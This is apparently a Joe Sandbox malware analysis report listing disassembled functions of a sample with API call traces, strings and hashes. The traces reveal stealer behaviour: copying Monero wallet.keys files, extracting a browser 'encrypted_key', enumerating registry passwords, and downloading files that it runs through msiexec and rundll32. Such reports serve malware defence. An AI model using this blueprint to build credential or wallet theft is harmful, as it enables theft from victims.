                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateGlobalStream
                          • String ID: image/jpeg
                          • API String ID: 2244384528-3785015651
                          • Opcode ID: 6cfeb65b971d11f8a76d7e0fddd8239f70c1ad753e2d96f3e469f5e79ceebc88
                          • Instruction ID: ff851e901c1916ec269341fbde9ac8ed507dbf722e01a4c3c8e9e4c67dd15b05
                          • Opcode Fuzzy Hash: 6cfeb65b971d11f8a76d7e0fddd8239f70c1ad753e2d96f3e469f5e79ceebc88
                          • Instruction Fuzzy Hash: F371EEB1910208AFDB14EFE5DC89FEEB7B8FB88700F148518F515AB290DB74A905DB61
                          Function 00CC2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00CC31C5
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00CC335D
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00CC34EA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExecuteShell$lstrcpy
                          • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                          • API String ID: 2507796910-3625054190
                          • Opcode ID: f34c82891b2d8865c3ace4ae194a5de3eb52b867578e220e5cfcf19f4f10d0d8
                          • Instruction ID: e2d9642f3c621a3b96380c84853b2f02de283b807d46f09b47f7c1a5818936be
                          • Opcode Fuzzy Hash: f34c82891b2d8865c3ace4ae194a5de3eb52b867578e220e5cfcf19f4f10d0d8
                          • Instruction Fuzzy Hash: 0612F97181010C9BDB19EBA0DC9AFEEB738AF14304F50416DF50666191EF342B8ADFA6
                          Function 00CC52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CCA7E6
                            • Part of subcall function 00CB6280: InternetOpenA.WININET(00CD0DFE,00000001,00000000,00000000,00000000), ref: 00CB62E1
                            • Part of subcall function 00CB6280: StrCmpCA.SHLWAPI(?,0189E6F8), ref: 00CB6303
                            • Part of subcall function 00CB6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00CB6335
                            • Part of subcall function 00CB6280: HttpOpenRequestA.WININET(00000000,GET,?,0189DEC8,00000000,00000000,00400100,00000000), ref: 00CB6385
                            • Part of subcall function 00CB6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00CB63BF
                            • Part of subcall function 00CB6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CB63D1
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00CC5318
                          • lstrlen.KERNEL32(00000000), ref: 00CC532F
                            • Part of subcall function 00CC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00CC8E52
                          • StrStrA.SHLWAPI(00000000,00000000), ref: 00CC5364
                          • lstrlen.KERNEL32(00000000), ref: 00CC5383
                          • lstrlen.KERNEL32(00000000), ref: 00CC53AE
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 3240024479-1526165396
                          • Opcode ID: 4b57e3367109e2c8c0a9216fb0d1a0f4f9695438a338dc0dee293d141207b949
                          • Instruction ID: cecceb7f92b5e54ee3e9bcf7baec06f25593d04afef7f74c149420713abacda6
                          • Opcode Fuzzy Hash: 4b57e3367109e2c8c0a9216fb0d1a0f4f9695438a338dc0dee293d141207b949
                          • Instruction Fuzzy Hash: 6551FC7091014C9FDB18FF61C99AFED7779AF50304F50402CE90A6A592DF346B4AEB62
                          Function 00CC12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: bd24e6352a69d569c8779adaaca367c843eb88ea0b53c6e08043872f0db57a0a
                          • Instruction ID: 0ed35a2b71e8d04784fc2e52af5741ea2d46990a806bed0346f3f40091522ba0
                          • Opcode Fuzzy Hash: bd24e6352a69d569c8779adaaca367c843eb88ea0b53c6e08043872f0db57a0a
                          • Instruction Fuzzy Hash: 79C195B590011D9BCB14EF61DC89FEA7378BB94304F1445ACF50AA7182DA70EA89DF91
                          Function 00CC4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00CC8E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00CC42EC
                          • lstrcat.KERNEL32(?,0189E390), ref: 00CC430B
                          • lstrcat.KERNEL32(?,?), ref: 00CC431F
                          • lstrcat.KERNEL32(?,0189CF90), ref: 00CC4333
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CC8D90: GetFileAttributesA.KERNEL32(00000000,?,00CB1B54,?,?,00CD564C,?,?,00CD0E1F), ref: 00CC8D9F
                            • Part of subcall function 00CB9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00CB9D39
                            • Part of subcall function 00CB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CB99EC
                            • Part of subcall function 00CB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00CB9A11
                            • Part of subcall function 00CB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00CB9A31
                            • Part of subcall function 00CB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00CB148F,00000000), ref: 00CB9A5A
                            • Part of subcall function 00CB99C0: LocalFree.KERNEL32(00CB148F), ref: 00CB9A90
                            • Part of subcall function 00CB99C0: CloseHandle.KERNEL32(000000FF), ref: 00CB9A9A
                            • Part of subcall function 00CC93C0: GlobalAlloc.KERNEL32(00000000,00CC43DD,00CC43DD), ref: 00CC93D3
                          • StrStrA.SHLWAPI(?,0189E468), ref: 00CC43F3
                          • GlobalFree.KERNEL32(?), ref: 00CC4512
                            • Part of subcall function 00CB9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00CB4EEE,00000000,00000000), ref: 00CB9AEF
                            • Part of subcall function 00CB9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00CB4EEE,00000000,?), ref: 00CB9B01
                            • Part of subcall function 00CB9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00CB4EEE,00000000,00000000), ref: 00CB9B2A
                            • Part of subcall function 00CB9AC0: LocalFree.KERNEL32(?,?,?,?,00CB4EEE,00000000,?), ref: 00CB9B3F
                          • lstrcat.KERNEL32(?,00000000), ref: 00CC44A3
                          • StrCmpCA.SHLWAPI(?,00CD08D1), ref: 00CC44C0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00CC44D2
                          • lstrcat.KERNEL32(00000000,?), ref: 00CC44E5
                          • lstrcat.KERNEL32(00000000,00CD0FB8), ref: 00CC44F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                          • String ID:
                          • API String ID: 3541710228-0
                          • Opcode ID: 575362ad4b92cbc727476fba3f964314243e5471c6357ce378a8021333b90d11
                          • Instruction ID: 29acedd2c80ad280441498af6f774b6e34053b598ee45933b9b9376c69327c57
                          • Opcode Fuzzy Hash: 575362ad4b92cbc727476fba3f964314243e5471c6357ce378a8021333b90d11
                          • Instruction Fuzzy Hash: 1E715AB6900208ABDB14EBA0DC5AFEE7379BB88304F04859CF609A7181DA75DB49DF51
                          Function 00CB1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CB12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CB12B4
                            • Part of subcall function 00CB12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00CB12BB
                            • Part of subcall function 00CB12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00CB12D7
                            • Part of subcall function 00CB12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00CB12F5
                            • Part of subcall function 00CB12A0: RegCloseKey.ADVAPI32(?), ref: 00CB12FF
                          • lstrcat.KERNEL32(?,00000000), ref: 00CB134F
                          • lstrlen.KERNEL32(?), ref: 00CB135C
                          • lstrcat.KERNEL32(?,.keys), ref: 00CB1377
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                            • Part of subcall function 00CC8B60: GetSystemTime.KERNEL32(00CD0E1A,018992C8,00CD05AE,?,?,00CB13F9,?,0000001A,00CD0E1A,00000000,?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CC8B86
                            • Part of subcall function 00CCA920: lstrcpy.KERNEL32(00000000,?), ref: 00CCA972
                            • Part of subcall function 00CCA920: lstrcat.KERNEL32(00000000), ref: 00CCA982
                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00CB1465
                            • Part of subcall function 00CCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CCA7E6
                            • Part of subcall function 00CB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CB99EC
                            • Part of subcall function 00CB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00CB9A11
                            • Part of subcall function 00CB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00CB9A31
                            • Part of subcall function 00CB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00CB148F,00000000), ref: 00CB9A5A
                            • Part of subcall function 00CB99C0: LocalFree.KERNEL32(00CB148F), ref: 00CB9A90
                            • Part of subcall function 00CB99C0: CloseHandle.KERNEL32(000000FF), ref: 00CB9A9A
                          • DeleteFileA.KERNEL32(00000000), ref: 00CB14EF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                          • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                          • API String ID: 3478931302-218353709
                          • Opcode ID: 138251a77cd45ed4f3909f475f8be306930ee8376df92aeb20b3cb8fb9182643
                          • Instruction ID: 8f7193c37196d408f0328f5f849453bba6e1b1b405f972e8b23f32d000216ca3
                          • Opcode Fuzzy Hash: 138251a77cd45ed4f3909f475f8be306930ee8376df92aeb20b3cb8fb9182643
                          • Instruction Fuzzy Hash: 525121B1D5011C5BCB15EB60DC96FED733CAB54304F4041ACF60AA6082EE706B8ADFA6
                          Function 00CB75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CB72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00CB733A
                            • Part of subcall function 00CB72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00CB73B1
                            • Part of subcall function 00CB72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00CB740D
                            • Part of subcall function 00CB72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00CB7452
                            • Part of subcall function 00CB72D0: HeapFree.KERNEL32(00000000), ref: 00CB7459
                          • lstrcat.KERNEL32(00000000,00CD17FC), ref: 00CB7606
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00CB7648
                          • lstrcat.KERNEL32(00000000, : ), ref: 00CB765A
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00CB768F
                          • lstrcat.KERNEL32(00000000,00CD1804), ref: 00CB76A0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00CB76D3
                          • lstrcat.KERNEL32(00000000,00CD1808), ref: 00CB76ED
                          • task.LIBCPMTD ref: 00CB76FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                          • String ID: :
                          • API String ID: 2677904052-3653984579
                          • Opcode ID: 0ed67447b16840b99c0843e9e395e81d25c648bfa706a607051e11491b6501bf
                          • Instruction ID: 4626daa54428301cb4b7e7fef942e02660d82b9b81f3a38a0a4407d35d54730b
                          • Opcode Fuzzy Hash: 0ed67447b16840b99c0843e9e395e81d25c648bfa706a607051e11491b6501bf
                          • Instruction Fuzzy Hash: EA314EB1901109EFCB08EBB5DC9ADFE7778BB84301F184128F506BB291DA34A94ADB51
                          Function 00CC8100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0189E1F8,00000000,?,00CD0E2C,00000000,?,00000000), ref: 00CC8130
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CC8137
                          • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00CC8158
                          • __aulldiv.LIBCMT ref: 00CC8172
                          • __aulldiv.LIBCMT ref: 00CC8180
                          • wsprintfA.USER32 ref: 00CC81AC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB$@
                          • API String ID: 2774356765-3474575989
                          • Opcode ID: cd03d54873ba6de7b1fa164cb8e90aa29ccb0cf4c74479243d955347e5a89180
                          • Instruction ID: 6e1db13288829fabc303309865fc8ce9e78f24da8cf07612d633e92e80122315
                          • Opcode Fuzzy Hash: cd03d54873ba6de7b1fa164cb8e90aa29ccb0cf4c74479243d955347e5a89180
                          • Instruction Fuzzy Hash: 18213BB1E44248ABDB00DFD5CC49FAFB7B8FB44B10F144119F605BB280D77869058BA5
                          Function 00CB60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CCA7E6
                            • Part of subcall function 00CB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00CB4839
                            • Part of subcall function 00CB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00CB4849
                          • InternetOpenA.WININET(00CD0DF7,00000001,00000000,00000000,00000000), ref: 00CB610F
                          • StrCmpCA.SHLWAPI(?,0189E6F8), ref: 00CB6147
                          • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00CB618F
                          • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00CB61B3
                          • InternetReadFile.WININET(?,?,00000400,?), ref: 00CB61DC
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00CB620A
                          • CloseHandle.KERNEL32(?,?,00000400), ref: 00CB6249
                          • InternetCloseHandle.WININET(?), ref: 00CB6253
                          • InternetCloseHandle.WININET(00000000), ref: 00CB6260
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
